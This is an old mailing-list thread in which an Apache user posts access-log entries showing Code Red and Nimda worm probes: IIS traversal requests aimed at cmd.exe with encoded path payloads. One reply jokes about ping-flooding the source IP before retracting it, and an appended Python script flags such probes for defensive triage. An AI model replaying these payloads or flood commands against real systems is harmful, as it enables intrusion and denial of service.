Actually those are IIS that had been compromised with Code Red or Nimda and are
scanning port 80 for other IIS. You really don't have to worry about it.

On Wednesday 31 December 2003 10:57, Redeeman babbled:
> sometimes this isn't automated, but people that type in the IP without
> scan first, if you are on a heavy connection, and ain't scared that your
> ISP is gonna shut you down, try with ping -f 65.27.204.81 :-)
> just kidding, don't do it, it probably ain't the true owners of the ip
> that does it, they are probably victims themselves :-)
> 
> 
> On Wed, 2003-12-31 at 11:18, Aaron Walker wrote:
> > A week or so ago, I set up my cable router/firewall to forward port 80 to 
> > one of my machines so I could run Apache.  Last night while at work, I 
> > checked to see if it worked, and it did.  So just now, I went to check 
> > out the access_log and noticed some funny looking stuff, that doesn't 
> > look like normal activity....
> > 
> > <snipped from /var/log/apache2/access_log>
> > 
> > 218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> > 221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" 501 336 "-" "-"
> > 
> > is this someone trying to exploit apache?
> > 
> > Thanks,
> > Aaron
> -- 
> Regards, Redeeman
> ()  ascii ribbon campaign - against html e-mail 
> /\                        - against microsoft attachments


--
[EMAIL PROTECTED] mailing list
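
Added example, not part of the original thread: a small Python triage script that flags the kind of IIS worm probes quoted above in an Apache access_log and groups them by client IP with the status codes Apache returned. The function names and the marker lists are assumptions made for this sketch, built only from the requests shown in the post.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) ([^\s"]+)[^"]*" (\d{3}) ')
# Overlong UTF-8 encodings of "/" and "\" that appear in the quoted requests.
OVERLONG = re.compile(r'%c0%af|%c0%2f|%c1%1c|%c1%9c', re.I)
IIS_TARGETS = ('cmd.exe', 'root.exe', 'nsiislog.dll')

def fully_decode(path, max_rounds=5):
    """Percent-decode until stable, so %255c -> %5c -> backslash."""
    for _ in range(max_rounds):
        path, prev = unquote(path, encoding='latin-1'), path
        if path == prev:
            break
    return path

def classify(path):
    """Return the reasons a request path looks like an IIS worm probe."""
    reasons = []
    if OVERLONG.search(path):
        reasons.append('overlong-utf8')
    decoded = fully_decode(path).lower()
    if any(t in decoded for t in IIS_TARGETS):
        reasons.append('iis-target')
    if re.search(r'\.\.[/\\]', decoded):
        reasons.append('traversal')
    return reasons

def summarize(lines):
    """Group flagged requests by client IP, with the status codes served."""
    report = defaultdict(lambda: {'hits': 0, 'reasons': set(), 'statuses': set()})
    for line in lines:
        m = LOG_RE.match(line)
        reasons = classify(m.group(3)) if m else []
        if reasons:
            entry = report[m.group(1)]
            entry['hits'] += 1
            entry['reasons'].update(reasons)
            entry['statuses'].add(int(m.group(4)))
    return dict(report)

# First four entries are from the post (rejoined); the last is a constructed benign hit.
SAMPLE = [
    '218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-"',
    '65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"',
    '65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"',
    '65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"',
    '192.0.2.10 - - [28/Dec/2003:21:00:00 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
]
```

Calling `summarize(SAMPLE)` lists each probing client with only 4xx statuses, which is the quick check that nothing was actually served to them; a 200 next to one of these paths would be the entry to look at.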
